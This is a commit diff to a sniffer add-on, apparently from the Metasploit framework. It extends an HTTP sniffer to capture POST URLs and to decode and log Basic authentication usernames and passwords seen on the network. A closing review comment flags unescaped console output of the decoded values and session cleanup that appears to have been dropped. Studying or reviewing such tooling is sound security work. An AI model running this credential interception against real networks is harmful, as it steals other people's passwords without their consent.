Land #10315, pSnuffle POST and basic auth

GSoC/Meterpreter_Web_Console
William Vu 2018-07-17 12:59:12 -05:00
commit d5f10a74c7
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 20 additions and 13 deletions


@ -1,22 +1,24 @@
# Psnuffle password sniffer add-on class for HTTP GET URL's # Psnuffle password sniffer add-on class for HTTP URLs
# part of psnuffle sniffer auxiliary module # part of psnuffle sniffer auxiliary module
#
# Very simple example how to write sniffer extensions
#
# Sniffer class for GET URL's #
# Sniffer class for GET/POST URLs.
# Also extracts HTTP Basic authentication credentials.
#
class SnifferURL < BaseProtocolParser class SnifferURL < BaseProtocolParser
def register_sigs def register_sigs
self.sigs = { self.sigs = {
:get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i, :get => /^GET\s+([^\n]+)\s+HTTP\/\d\.\d/i,
:webhost => /^HOST\:\s+([^\n\r]+)/i, :post => /^POST\s+([^\n]+)\s+HTTP\/\d\.\d/i,
:webhost => /^HOST:\s+([^\n\r]+)/i,
:basic_auth => /^Authorization:\s+Basic\s+([^\n\r]+)/i,
} }
end end
def parse(pkt) def parse(pkt)
# We want to return immediantly if we do not have a packet which is handled by us # We want to return immediately if we do not have a packet which is handled by us
return unless pkt.is_tcp? return unless pkt.is_tcp?
return if (pkt.tcp_sport != 80 and pkt.tcp_dport != 80) return if (pkt.tcp_sport != 80 && pkt.tcp_dport != 80)
s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt)) s = find_session((pkt.tcp_sport == 80) ? get_session_src(pkt) : get_session_dst(pkt))
self.sigs.each_key do |k| self.sigs.each_key do |k|
@ -34,10 +36,16 @@ class SnifferURL < BaseProtocolParser
case matched case matched
when :webhost when :webhost
sessions[s[:session]].merge!({k => matches}) sessions[s[:session]].merge!({k => matches})
if(s[:get]) if s[:get]
print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}") print_status("HTTP GET: #{s[:session]} http://#{s[:webhost]}#{s[:get]}")
sessions.delete(s[:session]) end
return if s[:post]
print_status("HTTP POST: #{s[:session]} http://#{s[:webhost]}#{s[:post]}")
end
if s[:basic_auth]
s[:user], s[:pass] = Rex::Text.decode_base64(s[:basic_auth]).split(':', 2)
report_auth_info s
print_status "HTTP Basic Authentication: #{s[:session]} >> #{s[:user]} / #{s[:pass]}"
end end
when nil when nil
# No matches, no saved state # No matches, no saved state
@ -45,4 +53,3 @@ class SnifferURL < BaseProtocolParser
end # end of each_key end # end of each_key
end # end of parse end # end of parse
end # end of URL sniffer end # end of URL sniffer
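Review bot: In the new `if s[:basic_auth]` branch, the Base64-decoded header comes straight off the wire and is interpolated into `print_status` and passed to `report_auth_info` with no validation. The raw header is limited by `[^\n\r]+`, but the decoded bytes can contain newlines or terminal control sequences, which then reach the console and the stored record verbatim. A decoded value with no colon leaves `s[:pass]` nil, and an empty decode leaves both fields nil. I would escape the fields when printing, e.g. `print_status "HTTP Basic Authentication: #{s[:session]} >> #{s[:user].inspect} / #{s[:pass].inspect}"`, and skip `report_auth_info` when either part is nil. Separately, the new side of the `:webhost` branch appears to drop `sessions.delete(s[:session])` and the `return`; unless cleanup happens in the part of `parse` outside these hunks, per-session state grows without bound and old values may be reported again on later packets.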